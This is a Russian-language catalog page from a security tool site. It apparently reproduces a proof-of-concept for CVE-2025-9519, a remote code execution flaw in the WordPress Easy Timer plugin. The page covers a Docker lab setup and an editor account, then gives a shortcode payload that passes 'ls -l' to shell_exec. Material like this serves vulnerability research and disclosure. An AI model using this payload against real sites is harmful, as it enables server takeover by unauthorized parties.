Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Poc-CVE-2025-9519 — Эксплойт-доказательство концепции для CVE-2025-9519, демонстрирующий удалённое выполнение кода в плагине WordPress Easy Timer через специально сформированный фильтр шорткода, с настройкой на основе Docker. | Kitploit
Инструменты/GitHubGitHub/nimisha17/poc-cve-2025-9519
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubnimisha17/poc-cve-2025-9519

Poc-CVE-2025-9519

Эксплойт-доказательство концепции для CVE-2025-9519, демонстрирующий удалённое выполнение кода в плагине WordPress Easy Timer через специально сформированный фильтр шорткода, с настройкой на основе Docker.

Репозиторий
2110 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Easy Timer v4.2.1 -

Предварительные требования

  • Установленный Docker Engine
  • Установленный Docker Compose

Обратитесь к официальной документации Docker для установки: Docker Engine Install

1. Запуск WordPress с помощью Docker

Из каталога вашего проекта:

root@kitploit:~
sudo docker-compose up -d
mkdir -p wp-content/plugins
cd wp-content/plugins

wget https://downloads.wordpress.org/plugin/easy-timer.4.2.1.zip
unzip easy-timer.4.2.1.zip

sudo docker compose restart wordpress

2. Настройка WordPress

  1. Перейдите по адресу http://localhost:8000/
  2. Завершите настройку WordPress
  3. Перейдите в Панель управления WordPress → → и нажмите .
Плагины
Easy Timer
Активировать
Screenshot from 2025-10-27 12-52-06

3. Добавление нового пользователя с правами редактора

Из каталога вашего проекта выполните следующую команду:

root@kitploit:~
docker compose run --rm wpcli user create \
  editoruser [email protected] \
  --role=editor \
  --user_pass=P@ssw0rd!

(примечание: замените на свои имя пользователя, адрес электронной почты и пароль!)

4. Создание записи

  1. Перейдите в Записи → Добавить новую
  2. Вставьте блок Шорткод и введите:
root@kitploit:~
[countdown date=2025/12/17-00:00:00 filter="shell_exec"]ls -l[/countdown]
  1. Нажмите Обновить → Предпросмотр записи, чтобы увидеть выполнение таймера.

⚠️ Примечание: Убедитесь, что вы используете блок Шорткод, а не блок «Абзац», чтобы шорткод отображался корректно.

Screenshot from 2025-10-27 13-36-40

Поздравляем, вы получили RCE. image

Советы по отладке

  • Проверьте запущенные контейнеры:
root@kitploit:~
sudo docker ps

Вы должны увидеть что-то вроде:

Screenshot from 2025-10-27 12-51-08
  • Если шорткоды не отображаются:

    1. Перейдите в Внешний вид → Темы
    2. Активируйте Twenty Twenty-Three (или другую стандартную тему).
  • Если при переходе по адресу http://localhost:8000/ отображается сообщение База данных не подключена:

    1. Подождите минуту или две, пока база данных завершит настройку.
Скачать инструмент